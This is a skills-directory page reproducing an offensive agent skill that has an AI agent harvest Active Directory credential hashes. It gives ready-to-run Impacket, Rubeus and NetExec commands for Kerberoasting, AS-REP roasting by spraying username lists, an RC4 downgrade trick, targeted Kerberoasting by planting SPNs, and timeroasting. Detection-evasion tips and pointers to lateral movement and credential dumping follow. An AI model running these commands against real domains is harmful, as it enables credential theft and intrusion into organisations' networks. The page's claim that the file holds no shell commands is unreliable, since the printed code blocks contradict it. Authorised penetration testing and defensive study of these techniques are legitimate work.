Agent skill

Kerberos Roasting

by blacklanternsecurity in blacklanternsecurity/red-run

Extracts and cracks Kerberos service tickets (Kerberoasting) and AS-REP hashes (AS-REP Roasting) for offline password recovery.

GPL-3.0Auto-check: notesSecurity

Install Kerberos Roasting

skills CLI
$ npx skills add blacklanternsecurity/red-run --skill kerberos-roasting -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install blacklanternsecurity/red-run kerberos-roasting --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/blacklanternsecurity/red-run.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/ad/kerberos-roasting .claude/skills/kerberos-roasting && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
kerberos-roasting
GitHub stars
287
Token cost
~3.5k tokens
SKILL.md length
1,079 words
Files
1
Skills in repo
6
Repo updated
First seen
Licence
GPL-3.0

At a glance

Extracts and cracks Kerberos service tickets (Kerberoasting) and AS-REP hashes (AS-REP Roasting) for offline password recovery.

  • Works in 9 steps: Assess → Enumerate Kerberoastable Accounts → Extract TGS Hashes (Kerberoasting) → …
  • Security work in your project
  • SKILL.md covers Engagement Logging, State Management, Prerequisites and Privileged Commands, plus 10 more sections
  • Instructions only: no scripts, shell commands, URLs or credentials in SKILL.md

What it does

Kerberos Roasting is an agent skill from blacklanternsecurity/red-run. Extracts and cracks Kerberos service tickets (Kerberoasting) and AS-REP hashes (AS-REP Roasting) for offline password recovery.

Its SKILL.md is about 3.5k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Security. The repository describes itself as: Offensive security toolkit for Claude Code. The licence is GPL-3.0.

When your agent uses it

  • Security work in your project

Example prompts

  • “Use the kerberos-roasting skill to extract and cracks Kerberos service tickets (Kerberoasting) and AS-REP hashes (AS-REP Roasting) for offline…”
  • “/kerberos-roasting”

Workflow steps

9 steps, taken from the step headings in SKILL.md.

  1. Assess
  2. Enumerate Kerberoastable Accounts
  3. Extract TGS Hashes (Kerberoasting)
  4. Crack Offline
  5. AS-REP Roasting
  6. Kerberoasting Without a Domain Account
  7. Targeted Kerberoasting (ACL Abuse)
  8. Timeroasting
  9. Escalate or Pivot

What it can do on your machine

Read from SKILL.md and the folder at commit 050ac1f. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    No scripts in the folder and no shell commands in SKILL.md (its code samples are bash and powershell).

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Kerberos Roasting loads about 3.5k tokens when it runs. Until then it costs about 36 tokens; SKILL.md has 1,079 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~36
When it runs · the whole SKILL.md, loaded when a task matches
~3.5k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check: notes

The automated check noted patterns worth knowing about, such as sudo or a known installer.

  • NoteRuns commands with sudoSKILL.md:363
    sudo timeroast.py DC_IP | tee ntp-hashes.txt
  • NoteRuns commands with sudoSKILL.md:395
    sudo ntpdate DC_IP
  • NoteRuns commands with sudoSKILL.md:397
    sudo rdate -n DC_IP

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from blacklanternsecurity/red-run at commit 050ac1f, republished under its GPL-3.0 licence (© blacklanternsecurity). 1,079 words, ~3,536 tokens.

Download SKILL.mdSave it as .claude/skills/kerberos-roasting/SKILL.md (or your agent's skills folder).
name
kerberos-roasting
description
Extracts and cracks Kerberos service tickets (Kerberoasting) and AS-REP hashes (AS-REP Roasting) for offline password recovery.
keywords
kerberoast, kerberoasting, asreproast, AS-REP, GetUserSPNs, service ticket, SPN cracking, roasting, GetNPUsers, pre-authentication disabled, targeting AD…
tools
Impacket (GetUserSPNs.py, GetNPUsers.py), Rubeus, netexec, targetedKerberoast.py
opsec
medium

Kerberos Roasting

You are helping a penetration tester perform Kerberoasting (extracting TGS tickets for offline cracking) and AS-REP Roasting (extracting AS-REP hashes from accounts without pre-authentication). All testing is under explicit written authorization.

Engagement Logging

Check for ./engagement/ directory. If absent, proceed without logging.

When an engagement directory exists:

  • Print [kerberos-roasting] Activated → <target> to the screen on activation.
  • Evidence → save significant output to engagement/evidence/ with descriptive filenames (e.g., sqli-users-dump.txt, ssrf-aws-creds.json).

State Management

Call get_state_summary() from the state MCP server to read current engagement state. Use it to:

  • Skip re-testing targets, parameters, or vulns already confirmed
  • Leverage existing credentials or access for this technique
  • Understand what's been tried and failed (check Blocked section)

Your return summary must include:

  • New targets/hosts discovered (with ports and services)
  • New credentials or tokens found
  • Access gained or changed (user, privilege level, method)
  • Vulnerabilities confirmed (with status and severity)
  • Pivot paths identified (what leads where)
  • Blocked items (what failed and why, whether retryable)

Prerequisites

  • Any valid domain user credential (for standard Kerberoasting/AS-REP roasting)
  • OR: a username with DONT_REQ_PREAUTH (for Kerberoasting without a domain account)
  • OR: just a username list (for AS-REP roasting without authentication)
  • Tools: Impacket, optionally netexec, Rubeus, bloodyAD

Kerberos-first authentication:

bash
# Get a TGT first
cd $TMPDIR && getTGT.py DOMAIN/user:'Password123' -dc-ip DC_IP
# or with NTLM hash
cd $TMPDIR && getTGT.py DOMAIN/user -hashes :NTHASH -dc-ip DC_IP

export KRB5CCNAME=$TMPDIR/user.ccache

# All Impacket roasting tools support -k -no-pass
GetUserSPNs.py DOMAIN/user@DC.DOMAIN.LOCAL -k -no-pass -dc-ip DC_IP -request
GetNPUsers.py DOMAIN/user@DC.DOMAIN.LOCAL -k -no-pass -dc-ip DC_IP

Tool output directory: getTGT.py writes <user>.ccache to CWD with no -out flag. Always prefix with cd $TMPDIR &&. TGS/AS-REP hash output files (via -outputfile) support explicit paths.

Privileged Commands

Claude Code cannot execute sudo commands. The following require root and must be handed off to the user:

  • timeroast.py — NTP authentication hash extraction (needs raw sockets for UDP 123)
  • ntpdate / rdate — clock synchronization (needed for Kerberos, requires root)

Handoff protocol: Present the full command including sudo, ask the user to run it, then read the output file (tee captures timeroast output) or confirm completion (ntpdate).

Non-privileged commands Claude can execute directly:

  • All roasting tools: GetUserSPNs.py, GetNPUsers.py, netexec, Rubeus
  • Targeted kerberoasting: targetedKerberoast.py, bloodyAD
  • Cracking: delegate to credential-recovery skill

Step 1: Assess

Determine what access level is available:

  1. Valid domain credentials (password, hash, or TGT) -> proceed to Step 2
  2. Username with DONT_REQ_PREAUTH known -> skip to Step 5 (AS-REP) or Step 6 (Kerberoasting without domain account)
  3. Username list only, no credentials -> skip to Step 5 (AS-REP)
  4. Write access to user objects (GenericAll/GenericWrite) -> Step 7 (Targeted)

Step 2: Enumerate Kerberoastable Accounts

Impacket (Linux)
bash
# List all user accounts with SPNs (no ticket request yet)
GetUserSPNs.py DOMAIN/user:'Password123' -dc-ip DC_IP

# With Kerberos auth
GetUserSPNs.py DOMAIN/user@DC.DOMAIN.LOCAL -k -no-pass -dc-ip DC_IP
NetExec
bash
# Enumerate via LDAP and extract in one step
nxc ldap DC01.DOMAIN.LOCAL -u 'user' -p 'Password123' \
  --kerberoasting kerberoast.txt

# With Kerberos auth
nxc ldap DC01.DOMAIN.LOCAL --use-kcache --kerberoasting kerberoast.txt
Rubeus (Windows)
powershell
# Statistics overview — encryption types, password age, admin status
.\Rubeus.exe kerberoast /stats

# List without requesting (enumeration only)
.\Rubeus.exe kerberoast /stats /nowrap
Prioritize Targets

Before mass-roasting, prioritize by:

  • AdminCount=1 — service accounts in privileged groups
  • pwdLastSet age — older passwords are weaker (years-old = likely crackable)
  • Encryption type — RC4 (etype 23) cracks 1000x faster than AES (etype 17/18)
  • Blast radius — BloodHound shortest path from SPN account to DA

Step 3: Extract TGS Hashes (Kerberoasting)

Impacket (Linux) — Preferred
bash
# Request all SPN tickets
GetUserSPNs.py DOMAIN/user:'Password123' -dc-ip DC_IP \
  -request -outputfile hashes.kerberoast

# Target single user (reduces noise)
GetUserSPNs.py DOMAIN/user:'Password123' -dc-ip DC_IP \
  -request-user svc_mssql -outputfile hashes.kerberoast

# With NTLM hash
GetUserSPNs.py DOMAIN/user -dc-ip DC_IP \
  -hashes :NTHASH -request -outputfile hashes.kerberoast

# With Kerberos auth (most OPSEC-safe)
GetUserSPNs.py DOMAIN/user@DC.DOMAIN.LOCAL -k -no-pass \
  -request -outputfile hashes.kerberoast
Rubeus (Windows)
powershell
# All SPNs (noisy — avoid in mature environments)
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

# Target single account
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast

# Admins only (smaller footprint)
.\Rubeus.exe kerberoast /ldapfilter:'(admincount=1)' /nowrap

# RC4 downgrade via tgtdeleg trick (forces RC4 even on AES-enabled accounts)
.\Rubeus.exe kerberoast /tgtdeleg

# OPSEC-safer: only roast accounts that already lack AES support
.\Rubeus.exe kerberoast /rc4opsec

# Throttled extraction
.\Rubeus.exe kerberoast /user:svc_mssql /delay:2000 /jitter:30 /nowrap

# Scope to specific OU
.\Rubeus.exe kerberoast /ou:"OU=ServiceAccounts,DC=domain,DC=local" /nowrap

# Target old passwords (more likely weak)
.\Rubeus.exe kerberoast /pwdsetbefore:01-01-2022 /nowrap
PowerView (Windows)
powershell
# All user SPNs to hashcat format
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv kerberoast.csv -NoTypeInformation

Step 4: Crack Offline

Hash Formats
Hash PrefixEncryptionHashcat ModeJohn Format
$krb5tgs$23$RC4 (etype 23)13100krb5tgs
$krb5tgs$17$AES128 (etype 17)19600krb5tgs
$krb5tgs$18$AES256 (etype 18)19700krb5tgs

Cracking speed: RC4 is ~1000x faster than AES. Always prefer RC4 tickets.

Do NOT crack hashes in this skill. Save hashes to engagement/evidence/ and return to the orchestrator with the hash file path, hash type/mode (see table above), and a routing recommendation to credential-recovery.

bash
# Save extracted TGS hashes to evidence
cp hashes.kerberoast engagement/evidence/kerberoast-tgs-hashes.txt
After Cracking (post credential-recovery)

With recovered service account credentials:

  1. Check what the account has access to (BloodHound, nxc)
  2. Test for local admin: nxc smb TARGETS -u svc_user -p 'CrackedPass' -d DOMAIN
  3. Look for (Pwn3d!) — local admin on servers
  4. Escalate for lateral movement or credential-dumping if admin

Step 5: AS-REP Roasting

Targets accounts with DONT_REQ_PREAUTH flag. No valid credentials needed to request the hash — only need to know the username.

Enumerate AS-REP Roastable Accounts
bash
# With credentials — auto-enumerate via LDAP
GetNPUsers.py DOMAIN/user:'Password123' -dc-ip DC_IP

# With Kerberos auth
GetNPUsers.py DOMAIN/user@DC.DOMAIN.LOCAL -k -no-pass -dc-ip DC_IP

# NetExec
nxc ldap DC01.DOMAIN.LOCAL -u 'user' -p 'Password123' \
  --asreproast asrep-hashes.txt

# bloodyAD — direct LDAP filter
bloodyAD -u user -p 'Password123' -d DOMAIN.LOCAL --host DC_IP \
  get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' \
  --attr sAMAccountName

# PowerView (Windows)
Get-DomainUser -PreauthNotRequired -Verbose
Extract AS-REP Hashes
bash
# Without credentials — spray a username list
GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat \
  -outputfile asrep-hashes.txt -dc-ip DC_IP

# Single known user (no password needed)
GetNPUsers.py DOMAIN/targetuser -no-pass -dc-ip DC_IP

# Rubeus (Windows)
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep-hashes.txt
.\Rubeus.exe asreproast /user:targetuser /format:hashcat /outfile:asrep-hashes.txt
AS-REP Hash Format Reference
Hash PrefixHashcat ModeJohn Format
$krb5asrep$23$18200krb5asrep

Do NOT crack hashes in this skill. Save AS-REP hashes to engagement/evidence/ and return to the orchestrator with the hash file path, hash type (AS-REP / hashcat mode 18200), and a routing recommendation to credential-recovery.

bash
# Save extracted AS-REP hashes to evidence
cp asrep-hashes.txt engagement/evidence/asrep-hashes.txt
Show full SKILL.md (441 more words)Show less

Step 6: Kerberoasting Without a Domain Account

If you have a username with DONT_REQ_PREAUTH but no valid domain password, you can request service tickets by altering the sname field in the AS-REQ.

bash
# Impacket (PR #1413) — provide no-preauth user and target list
GetUserSPNs.py -no-preauth "NOPREAUTH_USER" -usersfile users.txt \
  -dc-host DC01.DOMAIN.LOCAL DOMAIN.LOCAL/

# NetExec
nxc ldap DC01.DOMAIN.LOCAL -u '' -p '' \
  --no-preauth-targets users.txt --kerberoasting output.txt

# Rubeus
.\Rubeus.exe kerberoast /nopreauth:NOPREAUTH_USER /spn:TARGET_SPN \
  /domain:DOMAIN.LOCAL /dc:DC01.DOMAIN.LOCAL /outfile:hashes.txt

Limitation: Cannot enumerate SPNs via LDAP without credentials. Must provide a user list to test against.

Step 7: Targeted Kerberoasting (ACL Abuse)

When you have GenericWrite or GenericAll on a user account, you can temporarily set an SPN to make it Kerberoastable.

Automated (Linux)
bash
# targetedKerberoast.py — adds SPN, requests TGS (RC4), removes SPN
targetedKerberoast.py -d DOMAIN.LOCAL -u attacker -p 'Password123' \
  --request-user target_admin

# With Kerberos auth
targetedKerberoast.py -d DOMAIN.LOCAL -u attacker -k --no-pass \
  --request-user target_admin
Manual (Windows)
powershell
# 1. Add temporary SPN
Set-DomainObject -Identity target_admin -Set @{serviceprincipalname='fake/TempSvc'} -Verbose

# 2. Roast
.\Rubeus.exe kerberoast /user:target_admin /nowrap

# 3. Clean up immediately
Set-DomainObject -Identity target_admin -Clear serviceprincipalname -Verbose
OPSEC Warning
  • Adding/removing SPNs generates Event IDs 5136 and 4738 (directory service object modified and user account changed)
  • Keep the SPN window as short as possible
  • Use targetedKerberoast.py which automates cleanup

Step 8: Timeroasting

Exploits Windows NTP authentication to extract hashes for computer accounts. Completely unauthenticated — only needs network access to DC on UDP 123.

bash
# Request NTP hashes for all computer accounts
sudo timeroast.py DC_IP | tee ntp-hashes.txt
Hash TypeHashcat Mode
NTP (timeroast)31300

Do NOT crack hashes in this skill. Save NTP hashes to engagement/evidence/timeroast-hashes.txt and return to the orchestrator with the hash file path, hash type (NTP / hashcat mode 31300), and a routing recommendation to credential-recovery.

Practical value is limited: Computer account passwords are typically 120+ random characters. Most useful against trust accounts between domains, which may have weaker passwords.

Step 9: Escalate or Pivot

STOP and return to the orchestrator with:

  • What was achieved (RCE, creds, file read, etc.)
  • New credentials, access, or pivot paths discovered
  • Context for next steps (platform, access method, working payloads)

Troubleshooting

KRB_AP_ERR_SKEW (Clock Skew)

Kerberos requires clocks within 5 minutes of the DC. This is a Clock Skew Interrupt — stop immediately and return to the orchestrator. Do not retry or fall back to NTLM. The fix requires root:

bash
sudo ntpdate DC_IP
# or
sudo rdate -n DC_IP
No SPN Accounts Found
  • Computer accounts have SPNs but are not useful for Kerberoasting (passwords are 120+ char random). Only user accounts with SPNs are targets.
  • Check if SPNs are set on group managed service accounts (gMSA) — these also have strong passwords and are not crackable.
RC4 Disabled Domain-Wide

If only AES tickets are available:

  • Cracking is ~1000x slower but still feasible with good wordlists and rules
  • Use hashcat modes 19600 (AES128) or 19700 (AES256)
  • Consider the /tgtdeleg trick in Rubeus which may still force RC4
Hash Format Issues
  • Impacket outputs hashcat format by default
  • Rubeus outputs hashcat format with /format:hashcat
  • To convert .kirbi files: kirbi2john.py ticket.kirbi > hash.john
  • Convert John to hashcat: sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$*\1*\$\2/' hash.john
OPSEC Considerations
ActionDetectionEvent ID
TGS request (Kerberoast)Kerberos service ticket requested4769
AS-REP requestTGT requested with no pre-auth4768 (preauth type 0)
RC4 ticket requestAnomalous in AES-hardened domain4769 (etype 0x17)
SPN added/removed (targeted)Directory object modified5136, 4738
Mass TGS requestsHigh volume 4769 from single sourceSIEM correlation

© blacklanternsecurity, GPL-3.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in skills/ad/kerberos-roasting of blacklanternsecurity/red-run.

Open the folder on GitHubat commit 050ac1f

Compare with similar skills

Kerberos Roasting next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Kerberos Roasting compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Kerberos Roasting this skillblacklanternsecurity/red-run287—~3.5kAutomated safety check: NotesGPL-3.0
Fla Ascend Performancefla-org/flash-linear-attention5.8k—~6.3kAutomated safety check: PassMIT
Deepsec Documentation Guidevercel-labs/deepsec8.1k—~956Automated safety check: PassApache-2.0
Skill Scannergetsentry/skills1k4 repos~2.5kAutomated safety check: WarnApache-2.0
Serenity Aleabitoreddityan-labs/serenity-aleabitoreddit4811 repos~3.3kAutomated safety check: PassNone
Security Alert Triageelastic/agent-skills5921 repos~3.5kAutomated safety check: NotesApache-2.0

Similar skills

  • Fla Ascend Performance

    fla-org/flash-linear-attention

    Guidelines for Ascend NPU kernel / Triton-Ascend backend performance work in the FLA repo.

    5.8k GitHub stars~6.3k tokensUpdated today
    SecurityAuto-check passed
  • Deepsec Documentation Guide

    vercel-labs/deepsec

    Official

    Points the agent at deepsec's own docs to answer questions about initializing, configuring, resuming, scanning with and extending the vulnerability scanner.

    8.1k GitHub stars~956 tokensUpdated 10 days ago
    SecurityAuto-check passed
  • Skill Scanner

    getsentry/skills

    Official

    Scan agent skills for security issues. An agent skill from getsentry/skills.

    1k GitHub starsUsed in 4 repos~2.5k tokens
    SecurityAuto-check: warnings
  • Serenity Aleabitoreddit

    yan-labs/serenity-aleabitoreddit

    Apply trader Serenity's (@aleabitoreddit) AI/semiconductor supply-chain analytical lens to US-stock ideas and market judgment.

    481 GitHub starsUsed in 1 repo~3.3k tokens
    SecurityAuto-check passed
  • Security Alert Triage

    elastic/agent-skills

    Official

    Triage Elastic Security alerts — gather context, classify threats, create cases, and acknowledge.

    592 GitHub starsUsed in 1 repo~3.5k tokens
    SecurityAuto-check: notes
  • Shiro Attack CLI

    SummerSec/ShiroAttack2

    当用户要求利用、检测或测试 Apache Shiro rememberMe 反序列化漏洞 (Shiro-550, CVE-2016-4437) 时使用。触发词包括 "Shiro"、"rememberMe"、"shiro attack"、"CVE-2016-4437"、"Shiro-550"、"爆破 Shiro key"、"利用 Shiro"、"Shiro…

    2.6k GitHub stars~945 tokensUpdated 4 mo ago
    SecurityAuto-check passed

More from blacklanternsecurity/red-run

  • Source Code Review

    blacklanternsecurity/red-run

    Security-focused source code review. An agent skill from blacklanternsecurity/red-run.

    287 GitHub stars~1.8k tokensUpdated 10 days ago
    Auto-check: notes
  • Infrastructure Enumeration

    blacklanternsecurity/red-run

    Enumeration of infrastructure services: DNS, SMTP, SNMP, IPMI, NFS, TFTP, RPC/MSRPC, and HTTP/HTTPS surface detection.

    287 GitHub stars~2.4k tokensUpdated 10 days ago
    Auto-check: notes
  • Smb Enumeration

    blacklanternsecurity/red-run

    SMB share enumeration, access testing, password policy extraction, and content searching.

    287 GitHub stars~3k tokensUpdated 10 days ago
    Auto-check passed
  • Trust Attacks

    blacklanternsecurity/red-run

    Enumerates Active Directory trust relationships and exploits them for cross-domain and cross-forest privilege escalation.

    287 GitHub stars~4.5k tokensUpdated 10 days ago
    Auto-check: notes
  • Av Edr Evasion

    blacklanternsecurity/red-run

    Bypass antivirus and EDR detection for payload delivery during exploitation.

    287 GitHub stars~5.4k tokensUpdated 10 days ago
    Auto-check: notes

Categories

Questions about Kerberos Roasting

What does Kerberos Roasting do?

Extracts and cracks Kerberos service tickets (Kerberoasting) and AS-REP hashes (AS-REP Roasting) for offline password recovery. Kerberos Roasting is an agent skill from blacklanternsecurity/red-run. Extracts and cracks Kerberos service tickets (Kerberoasting) and AS-REP hashes (AS-REP Roasting) for offline password recovery.

When should I use Kerberos Roasting?

Kerberos Roasting fits situations like: security work in your project.

How do I install Kerberos Roasting in Claude Code?

Run `npx skills add blacklanternsecurity/red-run --skill kerberos-roasting -a claude-code`. Or copy the skill folder (skills/ad/kerberos-roasting in blacklanternsecurity/red-run) into .claude/skills/kerberos-roasting in your project. Claude Code loads it when a task matches its description.

How do I install Kerberos Roasting in Codex?

Run `npx skills add blacklanternsecurity/red-run --skill kerberos-roasting -a codex`. Or copy the skill folder (skills/ad/kerberos-roasting in blacklanternsecurity/red-run) into .agents/skills/kerberos-roasting in your project. Codex loads it when a task matches its description.

Can I use Kerberos Roasting in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add blacklanternsecurity/red-run --skill kerberos-roasting -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/kerberos-roasting, .gemini/skills/kerberos-roasting, .github/skills/kerberos-roasting and .opencode/skills/kerberos-roasting in your project.

What does Kerberos Roasting need to run?

SKILL.md names no scripts, command-line tools or credentials: Kerberos Roasting is instructions for the agent only.

Does Kerberos Roasting access the network?

SKILL.md contains no URLs. Any network use would come from the scripts or tools the agent runs. This is read from the text; nothing was executed.

Is Kerberos Roasting safe to install?

Our automated static check of SKILL.md found notes only (runs commands with sudo), nothing it rates as a warning. It is not a guarantee. Review the folder before installing.

What licence does Kerberos Roasting use?

Kerberos Roasting is published under the GPL-3.0 licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Kerberos Roasting use?

About 3.5k tokens (SKILL.md is roughly 14k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Kerberos Roasting?

Skills that share tags, products or a category with Kerberos Roasting: Fla Ascend Performance (fla-org/flash-linear-attention, 5.8k stars), Deepsec Documentation Guide (vercel-labs/deepsec, 8.1k stars), Skill Scanner (getsentry/skills, 1k stars) and Serenity Aleabitoreddit (yan-labs/serenity-aleabitoreddit, 481 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Kerberos Roasting?

blacklanternsecurity (a GitHub organization) maintains it in blacklanternsecurity/red-run, which has 287 GitHub stars. The repository holds 6 skills in this directory. The repository was last updated on September 28, 2026.

Source: blacklanternsecurity/red-run on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.